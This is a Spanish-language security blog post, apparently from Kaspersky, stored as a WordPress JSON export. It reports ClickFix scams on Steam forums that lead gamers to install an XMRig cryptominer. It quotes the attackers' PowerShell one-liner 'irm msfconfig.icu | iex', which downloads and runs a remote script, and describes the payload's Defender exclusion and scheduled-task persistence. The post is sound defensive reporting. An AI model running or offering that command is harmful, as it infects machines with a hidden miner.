{"id":32393,"date":"2026-08-26T11:00:53","date_gmt":"2026-08-26T09:00:53","guid":{"rendered":"https:\/\/www.kaspersky.es\/blog\/?p=32393"},"modified":"2026-09-01T10:14:18","modified_gmt":"2026-09-01T08:14:18","slug":"steam-forum-clickfix-attack-irm-iex","status":"publish","type":"post","link":"https:\/\/www.kaspersky.es\/blog\/steam-forum-clickfix-attack-irm-iex\/32393\/","title":{"rendered":"Malos consejos para los jugadores: ClickFix llega a los foros de Steam"},"content":{"rendered":"<p>Este a\u00f1o ha sido testigo de un verdadero auge de los ataques de <a href=\"https:\/\/www.kaspersky.com\/blog\/what-is-clickfix\/53348\/\" target=\"_blank\" rel=\"noopener nofollow\">ClickFix<\/a>. Tiene tanto \u00e9xito entre los delincuentes que apenas terminamos de escribir sobre una variaci\u00f3n, es hora de cubrir la siguiente.<\/p>\n<p>Esta vez, los atacantes est\u00e1n apuntando a los jugadores: los periodistas de tecnolog\u00eda <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/steam-forum-clickfix-attacks-infect-gamers-with-xmrig-cryptominers\/\" target=\"_blank\" rel=\"noopener nofollow\">detectaron publicaciones que ofrec\u00edan consejos maliciosos<\/a> en los foros de Steam. Aqu\u00ed detallamos c\u00f3mo se ven estas publicaciones, qu\u00e9 malware suelen propagar y c\u00f3mo mantener seguro tu dispositivo.<\/p>\n<h2>ClickFix llega a los foros de Steam<\/h2>\n<p>Muchos jugadores recurren a sus compa\u00f1eros en los foros de Steam en busca de ayuda y consejos sobre cuestiones acerca de c\u00f3mo superar una misi\u00f3n complicada, subir de nivel, conseguir el mejor bot\u00edn o solucionar un error. Y es precisamente esta confianza en los consejos de la comunidad lo que los atacantes han decidido aprovechar.<\/p>\n<p>El ataque comienza cuando los delincuentes responden a la pregunta de alguien sobre fallos en el juego, objetos que faltan en el inventario u otros problemas t\u00e9cnicos. Haci\u00e9ndose pasar por usuarios dispuestos a ayudar, sugieren abrir PowerShell como administrador y ejecutar un comando que, supuestamente, soluciona el problema que tiene el usuario.<\/p>\n<div id=\"attachment_32398\" style=\"width: 1329px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/88\/2026\/08\/25175538\/steam-forum-clickfix-attack-irm-iex-1.jpg\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-32398\" class=\"wp-image-32398 size-full\" title=\"Publicaci\u00f3n de un actor malicioso en un foro de Steam\" src=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/88\/2026\/08\/25175538\/steam-forum-clickfix-attack-irm-iex-1.jpg\" alt=\"Publicaci\u00f3n de un actor malicioso en un foro de Steam\" width=\"1319\" height=\"947\"><\/a><p id=\"caption-attachment-32398\" class=\"wp-caption-text\">Haci\u00e9ndose pasar por un consejo para solucionar problemas, el autor malintencionado sugiere abrir PowerShell como administrador y ejecutar un comando que, supuestamente, resuelve el problema del usuario. <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/steam-forum-clickfix-attacks-infect-gamers-with-xmrig-cryptominers\/\" target=\"_blank\" rel=\"nofollow noopener\">Fuente.<\/a><\/p><\/div>\n<p>Como puedes imaginar, ejecutar el comando no soluciona nada, sino que solo abre una nueva caja de Pandora. Esa es precisamente la idea detr\u00e1s de ClickFix: utilizar la ingenier\u00eda social para enga\u00f1ar a las v\u00edctimas y que ellas mismas realicen acciones peligrosas, al tiempo que se proporciona a los estafadores lo que necesitan para comprometer el dispositivo. Ya hemos hablado anteriormente de otros trucos de ClickFix \u2014CAPTCHAs falsos, errores de navegador falsos y mucho m\u00e1s\u2014, todos ellos basados en conseguir que la v\u00edctima ejecute el comando malicioso por su cuenta. Puedes leer m\u00e1s sobre las <a href=\"https:\/\/www.kaspersky.es\/blog\/clickfix-attack-variations\/31917\/\" target=\"_blank\" rel=\"noopener\">diferentes variaciones de los ataques de ClickFix<\/a> en nuestra publicaci\u00f3n anterior.<\/p>\n<p>La astucia de usar ClickFix en los foros de Steam es que el ataque puede afectar no solo al jugador que ha pedido ayuda; muchos otros jugadores que tienen el mismo problema y encuentran la respuesta a trav\u00e9s de una b\u00fasqueda en Google tambi\u00e9n pueden caer en la trampa.<\/p>\n<h2>Una introducci\u00f3n r\u00e1pida: lo que realmente hay detr\u00e1s del comando <em>irm <\/em>| <em>iex<\/em><\/h2>\n<p>Antes de entrar en detalle sobre c\u00f3mo los atacantes enga\u00f1an a los jugadores para que instalen el programa de esta forma, debemos repasar algunos conceptos t\u00e9cnicos b\u00e1sicos. En primer lugar, las publicaciones en los foros de Steam aconsejan a las posibles v\u00edctimas desprevenidas que ejecuten el siguiente comando en PowerShell:<br>\n<code> irm msfconfig.icu | iex <\/code><\/p>\n<p>Para alguien que no est\u00e9 \u00edntimamente familiarizado con PowerShell, esta l\u00ednea puede parecer bastante inocua: se parece a la ejecuci\u00f3n de MSConfig, la utilidad de configuraci\u00f3n del sistema integrada de Windows, con algunos par\u00e1metros adicionales.<\/p>\n<p>Sin embargo, es todo menos inofensivo. Analicemos qu\u00e9 hace realmente cada parte de este comando:<\/p>\n<ol>\n<li><strong><em>irm<\/em><\/strong> es la abreviatura del comando integrado de PowerShell <em>Invoke-RestMethod<\/em>. Se comunica con la direcci\u00f3n web especificada m\u00e1s adelante en la l\u00ednea y recupera datos en respuesta.<\/li>\n<li><strong><em>icu<\/em><\/strong> es esa direcci\u00f3n web, no el nombre de alg\u00fan archivo local como podr\u00eda parecer a primera vista. Se trata del servidor de los atacantes y responde a la solicitud de <strong><em>irm<\/em><\/strong> con un script de PowerShell malicioso.<\/li>\n<li><strong><em>iex<\/em><\/strong> es otro comando integrado de PowerShell, <em>Invoke-Expression<\/em>. Toma todo lo que <strong><em>irm<\/em><\/strong> recibe de esa direcci\u00f3n web y lo ejecuta como c\u00f3digo de PowerShell.<\/li>\n<\/ol>\n<p>Una vez ejecutada, esta l\u00ednea de c\u00f3digo de PowerShell descarga un script del sitio web especificado y lo ejecuta de inmediato. Como <a href=\"https:\/\/www.reddit.com\/r\/PowerShell\/comments\/181l9lh\/what_is_irm_httpsmassgravedevget_iex\/\" target=\"_blank\" rel=\"noopener nofollow\">se\u00f1al\u00f3<\/a> acertadamente un usuario de Reddit, puedes averiguar de forma segura qu\u00e9 c\u00f3digo se descargar\u00eda realmente en tu dispositivo \u2014sin riesgo de que se ejecute\u2014 simplemente eliminando la segunda parte, <strong><em>iex<\/em><\/strong>. Sin ella, el comando se limitar\u00e1 a descargar el contenido del script y a mostrarlo en la ventana de PowerShell sin ejecutarlo. Este es el c\u00f3digo completo y no oculto que se te solicita que ejecutes en tu dispositivo. A continuaci\u00f3n, veamos qu\u00e9 es lo que estos serviciales usuarios del foro de Steam est\u00e1n intentando que los jugadores instalen en sus equipos.<\/p>\n<h2>Un criptominero, no una herramienta de optimizaci\u00f3n<\/h2>\n<p>Los atacantes se lo han preparado bien: el script de PowerShell descargado desde su servidor imita de forma muy convincente una utilidad de optimizaci\u00f3n de Windows. Una vez ejecutado, muestra al usuario una serie de notificaciones en las que afirma que va a borrar los archivos temporales, vaciar la cach\u00e9 de DNS, actualizar los controladores, comprobar si hay errores en el disco, desactivar las aplicaciones de inicio innecesarias, analizar el sistema en busca de malware, reparar la imagen de Windows y verificar la integridad de los archivos del sistema.<\/p>\n<div id=\"attachment_32397\" style=\"width: 960px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/88\/2026\/08\/25175347\/steam-forum-clickfix-attack-irm-iex-2.jpg\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-32397\" class=\"wp-image-32397 size-full\" title=\"Optimizaci\u00f3n falsa de Windows en curso\" src=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/88\/2026\/08\/25175347\/steam-forum-clickfix-attack-irm-iex-2.jpg\" alt=\"Optimizaci\u00f3n falsa de Windows en curso\" width=\"950\" height=\"436\"><\/a><p id=\"caption-attachment-32397\" class=\"wp-caption-text\">El script muestra un flujo de mensajes sobre diversas tareas de optimizaci\u00f3n falsas para dar la impresi\u00f3n de que est\u00e1 realizando un mantenimiento \u00fatil. <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/steam-forum-clickfix-attacks-infect-gamers-with-xmrig-cryptominers\/\" target=\"_blank\" rel=\"nofollow noopener\">Fuente <\/a><\/p><\/div>\n<p>Mientras tanto, la actividad real tiene lugar entre bastidores. El script comienza comprobando si se est\u00e1 ejecutando con privilegios de administrador. Si es as\u00ed, crea una carpeta de trabajo oculta en C:\\Windows\\Background y la a\u00f1ade a la lista de exclusiones de Microsoft Defender. A partir de ese momento, el antivirus integrado de Windows deja de analizar cualquier archivo que se guarde en esa carpeta.<\/p>\n<p>A continuaci\u00f3n, el script prepara el sistema para la siguiente fase del ataque y descarga un archivo ejecutable del servidor de los atacantes, guard\u00e1ndolo en esa misma carpeta C:\\Windows\\Background con el nombre, aparentemente leg\u00edtimo, de system.exe.<\/p>\n<p>El archivo descargado es XMRig, una de las herramientas m\u00e1s populares para minar la criptomoneda Monero. XMRig en s\u00ed mismo no es un programa malicioso; se trata de una herramienta de miner\u00eda leg\u00edtima y de c\u00f3digo abierto. El problema es que los atacantes la instalan en los ordenadores de las v\u00edctimas sin que estas lo sepan. Una vez en funcionamiento, la potencia de c\u00e1lculo del dispositivo es secuestrada para minar Monero, y la criptomoneda resultante va directamente a manos de los delincuentes.<\/p>\n<p>Esto convierte a los equipos de los jugadores en objetivos especialmente atractivos: los ordenadores modernos para videojuegos cuentan con potentes CPU y GPU, precisamente el tipo de hardware ideal para la miner\u00eda de criptomonedas.<\/p>\n<p>Para asegurarse de que el malware sobreviva a un reinicio, la secuencia de comandos tambi\u00e9n crea una nueva tarea en el Programador de tareas de Windows: <em>XMRig-{nombre del equipo}<\/em>. A partir de ese momento, inicia autom\u00e1ticamente el criptominero cada vez que se inicia el sistema.<\/p>\n<h2>C\u00f3mo proteger tu dispositivo de los criptomineros y otro tipo de malware<\/h2>\n<p>Por desgracia, muchos jugadores se muestran reacios a instalar software de seguridad \u2014o a mantenerlo activo\u2014 en sus dispositivos. La principal causa es el mito persistente de que \u201cun antivirus ralentiza el juego\u201d. a hemos hablado de estudios al respecto en nuestro blog, y los resultados demostraron que <a href=\"https:\/\/www.kaspersky.es\/blog\/tests-gamers-antiviruses\/28564\/\" target=\"_blank\" rel=\"noopener\">ejecutar un antivirus mientras se juega no supone una merma significativa del rendimiento<\/a>.<\/p>\n<p>Sin embargo, no se puede decir lo mismo de los criptomineros: definitivamente perjudican el rendimiento y desgastan tu hardware m\u00e1s r\u00e1pido. Entonces, \u00bfqu\u00e9 puedes hacer para mantener tus cuentas y tu PC para juegos fuera de peligro?<\/p>\n<ul>\n<li>Evita ejecutar PowerShell, Terminal u otros scripts de la l\u00ednea de comandos que las personas extra\u00f1as te sugieran que copies y ejecutes, ya sea en foros, chats o comentarios.<\/li>\n<li>Antes de pulsar <em>Intro<\/em> en cualquier comando que no comprendas completamente, busca lo que hace y las posibles consecuencias de ejecutarlo.<\/li>\n<li>Utiliza una <a href=\"https:\/\/www.kaspersky.es\/premium?icid=es_bb2022-kdplacehd_acq_ona_smm__onl_b2c_kdaily_lnk_sm-team___kprem___\" target=\"_blank\" rel=\"noopener\">soluci\u00f3n de seguridad fiable con un modo para videojuegos<\/a>, capaz de detectar a tiempo los intentos de descarga de malware y bloquear su ejecuci\u00f3n.<\/li>\n<li>No desactives la <a href=\"https:\/\/www.kaspersky.es\/premium?icid=es_bb2022-kdplacehd_acq_ona_smm__onl_b2c_kdaily_lnk_sm-team___kprem___\" target=\"_blank\" rel=\"noopener\">protecci\u00f3n<\/a> mientras juegas. Usar una soluci\u00f3n con un modo de juego exclusivo es el camino a seguir. <a href=\"https:\/\/www.kaspersky.es\/home-security?icid=es_kdailyplacehold_acq_ona_smm__onl_b2c_blo_lnk_sm-team______\" target=\"_blank\" rel=\"noopener\">Los productos de seguridad de Kaspersky<\/a> activan autom\u00e1ticamente ese modo tan pronto como se inicie un juego y retrasan las actualizaciones de bases de datos antivirus, las notificaciones y los an\u00e1lisis de disco programados hasta que hayas terminado de jugar.<\/li>\n<\/ul>\n<blockquote><p>\u00bfTe gustar\u00eda saber de qu\u00e9 otras formas atacan los ciberdelincuentes a los jugadores? Echa un vistazo a nuestras otras publicaciones:<\/p>\n<ul>\n<li><a href=\"https:\/\/www.kaspersky.com\/blog\/windows-stealer-stealka\/55058\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Ladr\u00f3n Stealka: la nueva cara de trucos, modificaciones y cracks de juegos<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/www.kaspersky.com\/blog\/update-unity-games-cve-2025-59489\/54542\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Vulnerabilidad en el motor de juegos de Unity<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/www.kaspersky.com\/blog\/gamer-malware-endgame-gear-steam-minecraft\/54336\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Jugadores bajo fuego: malware en los sitios web oficiales<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/www.kaspersky.com\/blog\/arcane-stealer-instead-of-cheats-for-minecraft\/53178\/\" target=\"_blank\" rel=\"noopener nofollow\"><strong>Ladr\u00f3n Arcane en lugar de trucos de Minecraft<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/www.kaspersky.es\/blog\/games-with-trojans-in-steam\/30774\/\" target=\"_blank\" rel=\"noopener\"><strong>Atenci\u00f3n, jugadores: los troyanos han invadido Steam<\/strong><\/a><\/li>\n<\/ul>\n<\/blockquote>\n<input type=\"hidden\" class=\"category_for_banner\" data-type=\"posts\" value=\"premium-gamer\">\n","protected":false},"excerpt":{"rendered":"<p>Los foros de Steam son el \u00faltimo campo de batalla de los ataques de ClickFix. Analizamos c\u00f3mo los atacantes se hacen pasar por usuarios que ofrecen ayuda para enga\u00f1ar a los jugadores y que instalen un minero de criptomonedas en sus ordenadores.<\/p>\n","protected":false},"author":2726,"featured_media":32394,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[1348],"tags":[3717,3783,2368,614,735,777,22,3784,134,23],"class_list":["post-32393","post","type-post","status-publish","format-standard","has-post-thumbnail","category-threats","tag-clickfix","tag-criptomineros","tag-criptomonedas","tag-ingenieria-social","tag-juegos","tag-jugadores","tag-malware-2","tag-powershell","tag-steam","tag-windows"],"hreflang":[{"hreflang":"es","url":"https:\/\/www.kaspersky.es\/blog\/steam-forum-clickfix-attack-irm-iex\/32393\/"},{"hreflang":"en-in","url":"https:\/\/www.kaspersky.co.in\/blog\/steam-forum-clickfix-attack-irm-iex\/30986\/"},{"hreflang":"en-ae","url":"https:\/\/me-en.kaspersky.com\/blog\/steam-forum-clickfix-attack-irm-iex\/26013\/"},{"hreflang":"ar","url":"https:\/\/me.kaspersky.com\/blog\/steam-forum-clickfix-attack-irm-iex\/13627\/"},{"hreflang":"en-gb","url":"https:\/\/www.kaspersky.co.uk\/blog\/steam-forum-clickfix-attack-irm-iex\/30815\/"},{"hreflang":"es-mx","url":"https:\/\/latam.kaspersky.com\/blog\/steam-forum-clickfix-attack-irm-iex\/29435\/"},{"hreflang":"it","url":"https:\/\/www.kaspersky.it\/blog\/steam-forum-clickfix-attack-irm-iex\/30941\/"},{"hreflang":"ru","url":"https:\/\/www.kaspersky.ru\/blog\/steam-forum-clickfix-attack-irm-iex\/42526\/"},{"hreflang":"tr","url":"https:\/\/www.kaspersky.com.tr\/blog\/steam-forum-clickfix-attack-irm-iex\/14809\/"},{"hreflang":"x-default","url":"https:\/\/www.kaspersky.com\/blog\/steam-forum-clickfix-attack-irm-iex\/56285\/"},{"hreflang":"fr","url":"https:\/\/www.kaspersky.fr\/blog\/steam-forum-clickfix-attack-irm-iex\/24214\/"},{"hreflang":"pt-br","url":"https:\/\/www.kaspersky.com.br\/blog\/steam-forum-clickfix-attack-irm-iex\/25265\/"},{"hreflang":"ru-kz","url":"https:\/\/blog.kaspersky.kz\/steam-forum-clickfix-attack-irm-iex\/30952\/"},{"hreflang":"en-au","url":"https:\/\/www.kaspersky.com.au\/blog\/steam-forum-clickfix-attack-irm-iex\/36479\/"},{"hreflang":"en-za","url":"https:\/\/www.kaspersky.co.za\/blog\/steam-forum-clickfix-attack-irm-iex\/36393\/"}],"acf":[],"banners":"","maintag":{"url":"https:\/\/www.kaspersky.es\/blog\/tag\/jugadores\/","name":"jugadores"},"_links":{"self":[{"href":"https:\/\/www.kaspersky.es\/blog\/wp-json\/wp\/v2\/posts\/32393","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.kaspersky.es\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.kaspersky.es\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.kaspersky.es\/blog\/wp-json\/wp\/v2\/users\/2726"}],"replies":[{"embeddable":true,"href":"https:\/\/www.kaspersky.es\/blog\/wp-json\/wp\/v2\/comments?post=32393"}],"version-history":[{"count":6,"href":"https:\/\/www.kaspersky.es\/blog\/wp-json\/wp\/v2\/posts\/32393\/revisions"}],"predecessor-version":[{"id":32423,"href":"https:\/\/www.kaspersky.es\/blog\/wp-json\/wp\/v2\/posts\/32393\/revisions\/32423"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.kaspersky.es\/blog\/wp-json\/wp\/v2\/media\/32394"}],"wp:attachment":[{"href":"https:\/\/www.kaspersky.es\/blog\/wp-json\/wp\/v2\/media?parent=32393"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.kaspersky.es\/blog\/wp-json\/wp\/v2\/categories?post=32393"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.kaspersky.es\/blog\/wp-json\/wp\/v2\/tags?post=32393"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}